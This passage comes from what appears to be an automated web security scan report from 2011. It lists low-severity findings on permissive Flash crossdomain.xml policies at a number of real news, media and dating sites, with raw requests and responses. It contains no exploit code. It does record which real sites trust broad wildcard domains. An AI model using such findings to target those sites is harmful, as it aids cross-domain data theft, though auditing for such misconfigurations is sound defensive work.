<allow-access-from domain="*.belo.com"/>
<allow-access-from domain="*.centralillinoisnewscenter.com"/>
<allow-access-from domain="*.cbs3springfield.com"/>
<allow-access-from domain="*.explorepolitics.com"/>
<allow-access-from domain="*.granitetv.com"/>
<allow-access-from domain="*.indianasnewscenter.com"/>
<allow-access-from domain="*.katu.com"/>
<allow-access-from domain="*.kcby.com"/>
<allow-access-from domain="*.kcrg.com"/>
<allow-access-from domain="*.kens5.com"/>
<allow-access-from domain="*.keprtv.com"/>
<allow-access-from domain="*.keyt.com"/>
<allow-access-from domain="*.kfbb.com"/>
<allow-access-from domain="*.kgw.com"/>
<allow-access-from domain="*.khou.com"/>
<allow-access-from domain="*.kidk.com"/>
<allow-access-from domain="*.kimatv.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.klewtv.com"/>
<allow-access-from domain="*.kmov.com"/>
<allow-access-from domain="*.knin.com"/>
<allow-access-from domain="*.komonews.com"/>
<allow-access-from domain="*.kpic.com"/>
<allow-access-from domain="*.krem.com"/>
<allow-access-from domain="*.ksee24.com"/>
<allow-access-from domain="*.ksbitv.com"/>
<allow-access-from domain="*.ktnv.com"/>
<allow-access-from domain="*.ktvb.com"/>
<allow-access-from domain="*.clickability.com"/>
<allow-access-from domain="*.kval.com"/>
<allow-access-from domain="*.kvi.com"/>
<allow-access-from domain="*.kvue.com"/>
<allow-access-from domain="*.kulr8.com"/>
<allow-access-from domain="*.northlandsnewscenter.com"/>
<allow-access-from domain="*.nwcn.com"/>
<allow-access-from domain="*.star1015.com"/>
<allow-access-from domain="*.tv20detroit.com"/>
<allow-access-from domain="*.wbng.com"/>
<allow-access-from domain="*.wcnc.com"/>
<allow-access-from domain="*.wdtv.com"/>
<allow-access-from domain="*.whas11.com"/>
<allow-access-from domain="*.wkbw.com"/>
<allow-access-from domain="*.wwltv.com"/>
<allow-access-from domain="*.wltz.com"/>
<allow-access-from domain="*.wnky.net"/>
<allow-access-from domain="*.wfaa.com"/>
<allow-access-from domain="*.wvec.com"/>
<allow-access-from domain="*.abc6.com"/>
<allow-access-from domain="*.wktv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.kjzz.com"/>
<allow-access-from domain="*.abcmontana.com"/>
<allow-access-from domain="*.wncftv.com"/>
<allow-access-from domain="*.ugclocal.com"/>
<allow-access-from domain="*.kmvt.com"/>
<allow-access-from domain="*.cnn.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.nbcuxd.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.indiancountrytoday.com"/>
<allow-access-from domain="*.indiancountry.com"/>
<allow-access-from domain="*.pro8news.com"/>
<allow-access-from domain="*.oneidaindiannation.com"/>
<allow-access-from domain="*.oneidanation.net"/>
<allow-access-from domain="*.kofytv.com"/>
<allow-access-from domain="*.wrdetv.com"/>
<allow-access-from domain="*.lively-nation.com"/>
<allow-access-from domain="*.ucdailynews.com"/>
<allow-access-from domain="*.wjys.tv"/>
<allow-access-from domain="*.wavenewspapers.com"/>
<allow-access-from domain="*.wwnytv.com"/>
<allow-access-from domain="*.laindependent.com"/>
<allow-access-from domain="*.fox24.com"/>
<allow-access-from domain="*.cachevalleydaily.com"/>
<allow-access-from domain="bim.images.vidavee.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.sharinghope.tv"/>
<allow-access-from domain="*.azfamily.com"/>
<allow-access-from domain="*.wpsdlocal6.com"/>
<allow-access-from domain="*.bimvid.com"/>
<allow-access-from domain="*.fox11az.com"/>
<allow-access-from domain="*.kissfmnews.com"/>
<allow-access-from domain="*.mychristiantv.net"/>
<allow-access-from domain="*.cheeseheadtalk.com"/>
<allow-access-from domain="*.myfoxmaine.com"/>
<allow-access-from domain="*.foxcharlotte.com"/>
<allow-access-from domain="*.wfrv.com"/>
<allow-access-from domain="*.wfxb.com"/>
<allow-access-from domain="*.newscentralga.com"/>
<allow-access-from domain="*.worcestermag.com"/>
<allow-access-from domain="*.khastv.com"/>
<allow-access-from domain="*.krextv.com"/>
<allow-access-from domain="*.bimlocal.com"/>
<allow-access-from domain="*.foxillinois.com"/>
<allow-access-from domain="*.thetobagonews.com"/>
<allow-access-from domain="*.trinidadexpress.com"/>
<allow-access-from domain="*.reachcaribbean.com"/>
<allow-access-from domain="*.klassicgrenada.com"/>
<allow-access-from domain="*.sixpointtt.com"/>
<allow-access-from domain="*.trinivoices.com"/>
<allow-access-from domain="*.fox50.com"/>
<allow-access-from domain="*.youralaskalink.com"/>
<allow-access-from domain="*.thehomeforinnovation.com"/>
<allow-access-from domain="*.classicrock102.net"/>
<allow-access-from domain="test.library.contentexchange.titantv.com"/>
<allow-access-from domain="*.titantv.com"/>
<allow-access-from domain="*.decisionmark.com"/>
<allow-access-from domain="*.newstalkkcrs.com"/>
<allow-access-from domain="*.1033kissfm.net"/>
<allow-access-from domain="*.mymix1067.com"/>
<allow-access-from domain="*.mycountry961.com"/>
<allow-access-from domain="*.myironmanstory.com"/>
<allow-access-from domain="*.kcwx.com"/>
<allow-access-from domain="*.ncwtv.com"/>
<allow-access-from domain="*.wktctv.com"/>
<allow-access-from domain="*.krbkhd.com"/>
<allow-access-from domain="*.ktva.com"/>
<allow-access-from domain="*.baystateparent.com"/>
<allow-access-from domain="*.itsyourbiz.com"/>
<allow-access-from domain="*.accuweather.com"/>
<allow-access-from domain="*.kmvt-1.com"/>
<allow-access-from domain="*.wbbjtv.com"/>
<allow-access-from domain="*.abccolumbia.com"/>
<allow-access-from domain="*.ntwinecx.com"/>
<allow-access-from domain="*.ntwineapp.com"/>
<allow-access-from domain="*.sbtv.com"/>
<allow-access-from domain="*.allbusiness.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hoovers.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dnb.com" secure="false"/>
...[SNIP]...

6.173. http://www.lakewood.cc/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lakewood.cc
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lakewood.cc

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:42:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Last-Modified: Thu, 14 Apr 2011 00:44:32 GMT
ETag: "{A32CB158-26C3-4BD5-95DF-F58DB84C804D},9"
ResourceTag: rt:A32CB158-26C3-4BD5-95DF-F58DB84C804D@00000000009
Content-Type: text/xml
Exires: Tue, 19 Apr 2011 03:42:25 GMT
Cache-Control: private,max-age=0
Content-Length: 295
Public-Extension: http://schemas.microsoft.com/repl-2

...<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="joelosteen.com"/>
<allow-access-from domain="*.joelosteen.com"/>
<allow-access-from domain="media.lakewood.org.edgesuite.net" />
<allow-access-from domain="*.edgesuite.net" />
...[SNIP]...

6.174. http://www.ldssingles.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ldssingles.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ldssingles.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:09:26 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA PRE"
Content-Length: 273
Keep-Alive: timeout=15, max=28
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.ldssingles.com" />
...[SNIP]...

6.175. http://www.livedoor.biz/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.livedoor.biz
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livedoor.biz

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:05:42 GMT
Server: Apache
Last-Modified: Mon, 07 Dec 2009 12:05:44 GMT
ETag: "25c06ce-164-47a2246e91600"
Accept-Ranges: bytes
Content-Length: 356
P3P: CP="BUS OUR PHY STP ADM CUR DEV PSA PSD"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.blogcms.jp" />
<allow-access-from domain="*.livedoor.com" />
<allow-access-from domain="*.floq.jp" />
<allow-access-from domain="*.deco-town.jp" />
...[SNIP]...

6.176. http://www.livemanplay.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.livemanplay.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livemanplay.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:45:19 GMT
Server: Apache
Last-Modified: Wed, 03 Mar 2010 19:12:09 GMT
Accept-Ranges: bytes
Content-Length: 218
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.naiadsystems.com" />
</cros
...[SNIP]...

6.177. http://www.luckymn.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.luckymn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.luckymn.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:11:01 GMT
Server: Apache
Last-Modified: Mon, 08 Feb 2010 22:14:07 GMT
ETag: "300cecad-236-47f1e1ea949c0"
Accept-Ranges: bytes
Content-Length: 566
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.mymegamillionsdream.com" />
<allow-access-from domain="*.startribune.com" />
<allow-access-from domain="*.twincities.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.pogo.com" />
<allow-access-from domain="*.minnpost.com" />
<allow-access-from domain="*.adinterax.com" />
<allow-access-from domain="*.collemcvoy.com" />
...[SNIP]...

6.178. http://www.manoramaonline.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.manoramaonline.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.manoramaonline.com

Response

HTTP/1.0 200 OK
Content-Length: 272
Content-Type: text/xml
Last-Modified: Fri, 24 Apr 2009 05:07:43 GMT
Accept-Ranges: bytes
ETag: "c5304f999ac4c91:dcfc1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:59:28 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.manoramaonline.com"/>
<allow-access-from domain="www.manoramanews.com"/>
...[SNIP]...

6.179. http://www.menshealth.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.menshealth.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.menshealth.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 2016
Content-Type: application/xml
Cache-Control: max-age=191
Date: Wed, 04 May 2011 02:08:23 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.syrupnyc.org"/>
   <allow-access-from domain="*.esquire.com"/>
   <allow-access-from domain="*.cosmogirl.com"/>
   <allow-access-from domain="*.cosmopolitan.com"/>
   <allow-access-from domain="*.countryliving.com"/>
   <allow-access-from domain="*.goodhousekeeping.com"/>
   <allow-access-from domain="*.harpersbazaar.com"/>
   <allow-access-from domain="*.housebeautiful.com"/>
   <allow-access-from domain="*.marieclaire.com"/>
   <allow-access-from domain="*.misquincemag.com"/>
   <allow-access-from domain="*.popularmechanics.com"/>
   <allow-access-from domain="*.quickandsimple.com"/>
   <allow-access-from domain="*.redbookmag.com"/>
   <allow-access-from domain="*.seventeen.com"/>
   <allow-access-from domain="*.teenmag.com"/>
   <allow-access-from domain="*.thedailygreen.com"/>
   <allow-access-from domain="*.veranda.com"/>
   <allow-access-from domain="*.townandcountrymag.com"/>
   <allow-access-from domain="*.townandcountrytravelmag.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.hearstmags.com"/>
   <allow-access-from domain="*.realage.com"/>
   <allow-access-from domain="*.realbeauty.com"/>
<allow-access-from domain="*.mstudio.com"/>
   <allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.thesurvivorsclub.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" />
   <allow-access-from domain="*.doubleclick.net"/>
   <allow-access-from domain="*.harpersbazaar.co.uk"/>
   <allow-access-from domain="*.company.co.uk"/>
   <allow-access-from domain="*.youandyourwedding.co.uk"/>
   <allow-access-from domain="*.menshealth.co.uk"/>
   <allow-access-from domain="*.babyexpert.com"/>
   <allow-access-from domain="*.handbag.com"/>
   <allow-access-from domain="*.cosmopolitan.co.uk"/>
...[SNIP]...

6.180. http://www.mkt859.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mkt859.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mkt859.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:36:20 GMT
Server: Apache
Last-Modified: Mon, 16 Aug 2010 18:37:10 GMT
ETag: "1cdc-ce0-48df51ecb8180"
Accept-Ranges: bytes
Content-Length: 3296
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="iso-8859-1"?>

<cross-domain-policy>
<site-control permitted-cross-domain-policies="m
...[SNIP]...
<allow-access-from domain="cisco.com" />
<allow-access-from domain="*.cisco.com" />
<allow-access-from domain="enjoyuserexperience.com" />
<allow-access-from domain="*.enjoyuserexperience.com" />
<allow-access-from domain="smileassessment.vmlapps.com" />
<allow-access-from domain="invisalign.com" />
<allow-access-from domain="winstage.vml.com" />
<allow-access-from domain="resp.survey01.net" />
<allow-access-from domain="www.atptennis.com" />
<allow-access-from domain="www.atptennis.atponline.net" />
<allow-access-from domain="vml.com"/>
<allow-access-from domain="*.vml.com"/>
<allow-access-from domain="vmlapps.com"/>
<allow-access-from domain="*.vmlapps.com"/>
<allow-access-from domain="*.invisalign.com"/>
<allow-access-from domain="publishinvisalign"/>
<allow-access-from domain="www.atpworldtour.com"/>
<allow-access-from domain="your-majesty.com"/>
<allow-access-from domain="*.your-majesty.com"/>
<allow-access-from domain="sethfloydjr.com"/>
<allow-access-from domain="*.content.ogilvy.edgesuite.net"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" />
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" />
...[SNIP]...
<allow-access-from domain="*.gstatic.com" />
...[SNIP]...
<allow-access-from domain="*.scholieren.tv"/>
...[SNIP]...
<allow-access-from domain="*.yourfuture.tv"/>
...[SNIP]...

6.181. http://www.moikrewni.pl/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.moikrewni.pl
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.moikrewni.pl

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 02:33:55 GMT
Content-Type: application/xml;charset=UTF-8
Connection: close
Set-Cookie: JSESSIONID=BE9687BE3483E573C59586504BC50B2F; Path=/
ETag: W/"1879-1266001692000"
Last-Modified: Fri, 12 Feb 2010 19:08:12 GMT
Content-Language: pl
Content-Length: 1879
X-XSS-Protection: 0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="verwandt.de" />
<allow-access-from domain="*.verwandt.de" />
<allow-access-from domain="verwant.nl" />
<allow-access-from domain="*.verwant.nl" />
<allow-access-from domain="familleunie.fr" />
<allow-access-from domain="*.familleunie.fr" />
<allow-access-from domain="verwandt.at" />
<allow-access-from domain="*.verwandt.at" />
<allow-access-from domain="verwandt.ch" />
<allow-access-from domain="*.verwandt.ch" />
<allow-access-from domain="parentistretti.it" />
<allow-access-from domain="*.parentistretti.it" />
<allow-access-from domain="moikrewni.pl" />
<allow-access-from domain="*.moikrewni.pl" />
<allow-access-from domain="miparentela.com" />
<allow-access-from domain="*.miparentela.com" />
<allow-access-from domain="meusparentes.com.pt" />
<allow-access-from domain="*.meusparentes.com.pt" />
<allow-access-from domain="meusparentes.com.br" />
<allow-access-from domain="*.meusparentes.com.br" />
<allow-access-from domain="dynastree.com" />
<allow-access-from domain="*.dynastree.com" />
<allow-access-from domain="dynastree.ca" />
<allow-access-from domain="*.dynastree.ca" />
<allow-access-from domain="dynastree.co.uk" />
<allow-access-from domain="*.dynastree.co.uk" />
<allow-access-from domain="*.semyaonline.ru" />
<allow-access-from domain="semyaonline.ru" />
<allow-access-from domain="*.akrabaonline.com" />
<allow-access-from domain="akrabaonline.com" />
<allow-access-from domain="*.dynas-tree.com" />
<allow-access-from domain="dynas-tree.com" />
<allow-access-from domain="verwandt4jtest.ics.int" />
<allow-access-from domain="*.verwandt4jtest.ics.int" />
...[SNIP]...

6.182. http://www.mygazines.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mygazines.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mygazines.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:41:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: _MGZ_=72uhjjr0ma7419ipmi1l740im3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Last-Modified: Tue, 03 May 2011 15:02:14 GMT
Content-Length: 239
Connection: close
Content-Type: text/xml

<cross-domain-policy><allow-access-from domain="*.mygazines.com" secure="false"/><allow-access-from domain="*.mygazines.com" to-ports="80,443"/><allow-http-request-headers-from domain="*.mygazines.com
...[SNIP]...

6.183. http://www.neogen.ro/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.neogen.ro
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.neogen.ro

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:19 GMT
Server: Apache
Last-Modified: Fri, 08 Apr 2011 16:56:20 GMT
ETag: "678481-fd-4a06b1ae4f500"
Accept-Ranges: bytes
Content-Length: 253
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
_eep-Alive: timeout=45
_onnection: Keep-Alive
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.adocean.pl" />
<allow-access-from domain="*.ineogen.ro" />
<allow-access-from domain="dzserv.neogen.ro" />
...[SNIP]...

6.184. http://www.newtondailynews.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.newtondailynews.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newtondailynews.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 11 Dec 2008 11:02:36 GMT
Vary: Cookie, User-Agent
Server: Roxen/4.5.241-release4
ETag: "effff9db19f6fd79e0766f5c7cc16797"
Accept-Ranges: bytes
Content-Type: text/xml; charset=ISO-8859-1
Date: Wed, 04 May 2011 01:41:13 GMT
Expires: Mon, 03 May 2010 19:41:13 GMT
Connection: close
Content-Length: 552

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.nwherald.com" />
<allow-access-from domain="*.chitownburbs.com" />
<allow-access-from domain="*.kcchronicle.com" />
<allow-access-from domain="*.mchenrycountysports.com" />
<allow-access-from domain="*.weeklyjournals.com" />
<allow-access-from domain="*.lakecountyjournals.com" />
<allow-access-from domain="*.elconquistadornews.com" />
...[SNIP]...

6.185. http://www.onntv.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.onntv.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.onntv.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:20:05 GMT
Server: Apache
Last-Modified: Thu, 14 Jan 2010 21:03:55 GMT
ETag: "3a230c-172-47d263992e4c0"
Accept-Ranges: bytes
Content-Length: 370
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*.dispatch.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.a-widget.com"/>
...[SNIP]...

6.186. http://www.onthesnow.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.onthesnow.com
Path:	/crossdomain.xml